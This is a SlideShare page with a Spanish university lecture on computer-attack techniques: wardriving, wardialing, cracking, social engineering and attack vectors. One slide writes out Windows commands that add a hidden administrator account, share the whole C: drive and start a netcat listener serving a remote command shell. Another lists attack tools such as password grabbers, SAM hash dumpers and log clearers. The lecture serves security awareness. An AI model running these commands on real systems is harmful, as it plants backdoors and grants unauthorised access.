TÉCNICAS DE ATAQUE ENSEGURIDAD INFORMÁTICAGrupo de I+D en Tecnologías de laInformación (GTI)(Esp) Siler Amador Donadosamad...
AGENDA Hackers vs Crackers El riesgo en la seguridad informática Pérdidas económicas por ataques informáticos Técnicas...
HACKERS VS CRACKERSHackers Crackers
EL RIESGO EN LA SEGURIDADINFORMÁTICA
PÉRDIDAS POR ATAQUESCCS/FBI
PÉRDIDAS POR ATAQUESCCS/FBI$67.2 billones por año$7.6 millones por hora
TECNICAS DE ATAQUEWardriving: Nombre que recibe la búsqueda de redesinalámbricas para documentar su posición. Para realiza...
TECNICAS DE ATAQUEWardialing: Fue una técnica de los 80´s y 90´s, consitía enmarcar repetidamente a modems y PBX´s disponi...
TECNICAS DE ATAQUECracking: Modificar un programa para obtener beneficios.Normalmente se basa en quitar pantallas introduc...
TECNICAS DE ATAQUEIng. Social: Persuadir a otra persona (a través de diversasformas) para que nos de un dato útil para cum...
VECTORES DE ATAQUE A UNA REDPuntos de accesoINTERNETMODEMWIRELESSFISICOREDWardrivingIng. SocialWardialingCracking
Y si tienen la oportunidad… Menos de 1 minuto es suficiente para:1. Crear una cuenta con privilegios de Admin!!!1. Abrir ...
Caja de Herramientas de ataque enlínea de comandosfport.exe - shows open ports and the process that owns the portiplist.ex...
LA PRÓXIMA GENERACION DETROYANOS KEYLOGERS…http://www.hispasec.com/laboratorio/troyano_video.htmVIDEO
EJEMPLO DE ATAQUE MASIVO EscenarioINTERNET LANATACANTE MAESTROZOMBIESLinux/WindowsMetasploitScripts en PythonLinux-BackTr...
... Y en la Unicauca que?• Electiva de seguridad informática• Área de interés en seguridad informática del GTI. (Proyectos...
CONCLUSIONES Los ataques de seguridad informática a nivel mundial sonaislados? Inversión en guerra informática? ECHELON,E...
Upcoming SlideShare
Loading in …5
×

Seguridad Informática

399 views

Published on

Conferencia Esp. Siler Amador

Published in: Education
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
399
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
10
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Seguridad Informática

  1. 1. TÉCNICAS DE ATAQUE ENSEGURIDAD INFORMÁTICAGrupo de I+D en Tecnologías de laInformación (GTI)(Esp) Siler Amador Donadosamador@unicauca.edu.cohttp://gseguridad.unicauca.edu.co
  2. 2. AGENDA Hackers vs Crackers El riesgo en la seguridad informática Pérdidas económicas por ataques informáticos Técnicas de ataque Vectores de ataque a una red Y si tienen la oportunidad… Caja de herramientas de ataque La próxima generación de Troyanos Keylogers Demo (Ataque Masivo) … Y en la Unicauca que? Conclusiones
  3. 3. HACKERS VS CRACKERSHackers Crackers
  4. 4. EL RIESGO EN LA SEGURIDADINFORMÁTICA
  5. 5. PÉRDIDAS POR ATAQUESCCS/FBI
  6. 6. PÉRDIDAS POR ATAQUESCCS/FBI$67.2 billones por año$7.6 millones por hora
  7. 7. TECNICAS DE ATAQUEWardriving: Nombre que recibe la búsqueda de redesinalámbricas para documentar su posición. Para realizar estabúsqueda se necesita como mínimo un equipo móvil (portátil) contarjeta Wireless, y si queremos que la posición sea precisa, un GPSpara pasar los datos a un mapa.Objetivo: Conectarse al punto de acceso (AP) mal configurado eingresar a la la red local de la empresa.Herramientas: NetStumbler Kismet http://www.wardrive.net/wardriving/tools
  8. 8. TECNICAS DE ATAQUEWardialing: Fue una técnica de los 80´s y 90´s, consitía enmarcar repetidamente a modems y PBX´s disponibles en la red y deesta forma irrumpir a sistemas remotos.Objetivo: Conectarse a modems o PBX´s mal configurados eingresar a la la red local de la empresa.Herramientas: THC-Scan 2.0 ModemScan ShokDial
  9. 9. TECNICAS DE ATAQUECracking: Modificar un programa para obtener beneficios.Normalmente se basa en quitar pantallas introductorias,protecciones o, como en unas modificaciones de cierto programa decomunicaciones, conseguir nuevos passwords de acceso asistemas.Objetivo:Tener acceso al software o a la red interna.Herramientas: Las 100 mejores http://sectools.org/ Inyección SQL XSS
  10. 10. TECNICAS DE ATAQUEIng. Social: Persuadir a otra persona (a través de diversasformas) para que nos de un dato útil para cumplir un objetivo. Estedato puede ser un password, un código, etc. incluso pueden darnombres de familiares y fechas importantes, que siempre se usanpara formar claves.Objetivo: Obtener información sensible que nos permita elacceso a la red.Herramientas: Teléfono Mucha psicología Inteligencia emocional http://www.laflecha.net/perfiles/tecnologia/kevin_mitnick/
  11. 11. VECTORES DE ATAQUE A UNA REDPuntos de accesoINTERNETMODEMWIRELESSFISICOREDWardrivingIng. SocialWardialingCracking
  12. 12. Y si tienen la oportunidad… Menos de 1 minuto es suficiente para:1. Crear una cuenta con privilegios de Admin!!!1. Abrir la consola de comandos2. C:net user fusm2010 fusm2010 /add3. C:net localgroup administradores fusm2010 /add2. Compartir toda la unidad del disco!!!1. C:net share fusm2010=c: /remark:”Demo fusm2010”3. Colocar un programa en escucha!!!1. http://gseguridad.unicauca.edu.co/nc.exe2. C:WINNTSystem32nc.exe -d -L -p 55555 -e cmd.exe
  13. 13. Caja de Herramientas de ataque enlínea de comandosfport.exe - shows open ports and the process that owns the portiplist.exe - enumerates the ips of the computermd5.exe - gets the md5 hash of a filepw2kget.exe - for win2k gets the password of the currently logged on userpwreveal.exe - gets the passwords of any window that has a ****** editboxregshell.exe - a commandline registry explorer/editorsendmail.exe - a commandline email senderuptime.exe - gets the machines current uptimexwhois - advanced whois lookupScreencap.exe - makes a screenshot of the screen and saves it to screenshot.bmpCMDget.exe - Downloads a file from a website from user provided parameterswebscr.exe - creates a snapshot from the webcam and saves itshutd.exe - program that forces shutdown/reboot of machinebnc.exe - bnc for windows (see bnc.cfg)clslog.exe - clears app/security/system logs XP/NT/2kenum.exe - enumerates IPC$ share to collect informationwinfo.exe - enumerates IPC$ share to collect informationFTPd.exe - small ftp server for dos (see slimftpd.conf)Global.exe - process dos command on all disc/subdirsiislog.exe - clears IIS logsInfo.exe - gets system informationispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir)nc.exe - netcatpv.exe - process manager for dosPwdump.exe - dumps SAM hashesscrnmode.exe - change screen mode from dosunrar.exe - unrar for doswget.exe - wget for windowswizmo.exe - command tool (see w.txt)dwpp.exe - dial up password graberwinrelay.exe - relay tcp/udp connectionsgetad.exe - escalate to admin user in w2kpipeup.exe - escalate to admin user in w2kdnsid - identify remore dns serverAgradecimientos a: NetrangerTomado de: http://www.governmentsecurity.org/forum/lofiversion/index.php/t2824.html
  14. 14. LA PRÓXIMA GENERACION DETROYANOS KEYLOGERS…http://www.hispasec.com/laboratorio/troyano_video.htmVIDEO
  15. 15. EJEMPLO DE ATAQUE MASIVO EscenarioINTERNET LANATACANTE MAESTROZOMBIESLinux/WindowsMetasploitScripts en PythonLinux-BackTrack4Win/XP/2Khttp://www.microsoft.com/spain/technet/seguridad/boletines/ms05-039-it.mspx
  16. 16. ... Y en la Unicauca que?• Electiva de seguridad informática• Área de interés en seguridad informática del GTI. (Proyectos de tesisde grado)• Legislación en comercio electrónico (Finalizado)• OBSES (Firewall Cluster Beowulf) (Finalizado)• INFORCE (Finalizado)• Antivirus-inteligente (En desarrollo)• Estudio de las tendencias predictivas sobre la escogencia decontraseñas basado en redes bayesianas (Finalizado)• Proyecto SGSI en UNICAUCA (En desarrollo)• PublicacionesPreocupación del departamento de sistemas de la FIET sobre laproblemática de la seguridad de la información en Colombia.
  17. 17. CONCLUSIONES Los ataques de seguridad informática a nivel mundial sonaislados? Inversión en guerra informática? ECHELON,ENFOPOL, CARNÍVORO…• USA• UK• CHINA• RUSIA Los sistemas de seguridad actuales son reactivos y correctivos.• Preventivos• Inteligentes Existen demasiadas herramientas de ataque gratis ydisponibles en la red. Las técnicas de ataque cambian constantemente. Segun las estadísticas es muy probable que su sistemahaya sido vulnerado y usted aún no lo sepa!!!.

×